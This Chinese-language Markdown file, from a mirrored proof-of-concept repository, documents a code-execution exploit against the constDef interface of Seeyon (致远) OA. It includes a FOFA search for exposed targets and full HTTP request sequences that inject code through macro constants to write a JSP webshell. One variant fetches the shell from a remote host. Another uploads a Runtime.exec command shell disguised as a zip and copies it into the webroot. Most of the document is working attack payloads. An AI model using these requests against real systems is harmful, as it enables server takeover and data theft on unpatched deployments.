admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/致远OA/致远OA系统constDef接口存在代码执行漏洞.md

180 lines
5.4 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 致远OA系统constDef接口存在代码执行漏洞
## fofa
```yaml
app="致远互联-OA"
```
## poc
首先新建一个常量constKey(常量名)为demo。
```yaml
/seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222340048.png)
可以通过如下接口查看常量是否新建完成。
```java
/seeyon/ajax.do?method=ajaxAction&managerName=constDefManager&rnd=123123123&managerMethod=listPage&arguments=%5B%7B%22page%22%3A1%2C%22size%22%3A20%7D%2C%7B%7D%5D
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222340957.png)
再新建一个常量constType值为4表示常量类型为宏替换在constDefine(常量定义)中引用常量demo构造闭合造成代码执行。
```yaml
/seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCVvdXQucHJpbnRsbigiMjEzMjEzIik7JT4=%22)));%22&constDescription=123&constType=4
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222341930.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222342108.png)
## 出网利用写webshell
**Step1**
出网情况直接通过远程下载可以比较有效**Bypass Waf**方法。
```java
POST /seeyon/constDef.do HTTP/1.1
Host: 172.16.135.220:8089
accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 545
method=newConstDef&constKey=uddd1&constDefine=new+File('../webapps/ROOT/test.jspx')+<<+new+URL('http%3a//192.168.43.81%3a18080/123.txt').text&constType=2
```
![image-20240723205434737](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232054812.png)
*** Step2***
引用`Step1`定义常量,构造闭合造成代码执行。
```java
POST /seeyon/constDef.do HTTP/1.1
Host: 172.16.135.220:8089
accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
method=newConstDef&constKey=runtime1c2345accaccc&constDefine=evaluate+$uddd1&constType=3
```
![image-20240723205550158](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232055225.png)
**Step3**
通过`listConstDef`方法触发漏洞
```javascript
POST /seeyon/constDef.do HTTP/1.1
Host: 172.16.135.220:8089
accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
method=listConstDef&page=1&rows=100
```
![image-20240723205641905](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232056968.png)
## 不出网情况
***Step1\***
把文件进行落地。
上传后的路径:**/base/upload/年/月/日/返回的id**
例如:**/base/upload/2024/07/22/2101525989813472287**
```bash
POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host: 172.16.135.236:8089
Cookie: JSESSIONID=0D3102C6F8445B2207B3A29DF9C4BAE6
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1172
-----------------------------1416682316313
Content-Disposition: form-data; name="type"
-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"
-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"
-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"
-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"
-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"
-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"
false
-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="tets.zip"
Content-Type: Image/x-zip-compressed
<% Runtime.getRuntime().exec(request.getParameter("a"));%>
-----------------------------1416682316313--
```
![image-20240723205817934](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232058005.png)
Step2
通过读取本地文件,进行写入文件可以完美解决写入文件长度的长度
```bash
POST /seeyon/constDef.do HTTP/1.1
Host: 172.16.135.220:8089
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F72080DF26DFA10AF113DF1F6BC38530; hostname=172.16.135.220:8089; login_locale=zh_CN; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 545
method=newConstDef&constKey=u6da&constDefine=new+File('../webapps/ROOT/gsl.jsp')+<<+new+File('../../base/upload/2024/06/06/2101525989813472287').text&constType=2
```
后续两个步骤触发漏洞跟之前的**Step2**、**Step3**一样。
## 漏洞来源
- https://blog.csdn.net/LiangYueSec/article/details/140608564
- https://www.t00ls.com/thread-72119-1-1.html
Reference in New Issue Copy Permalink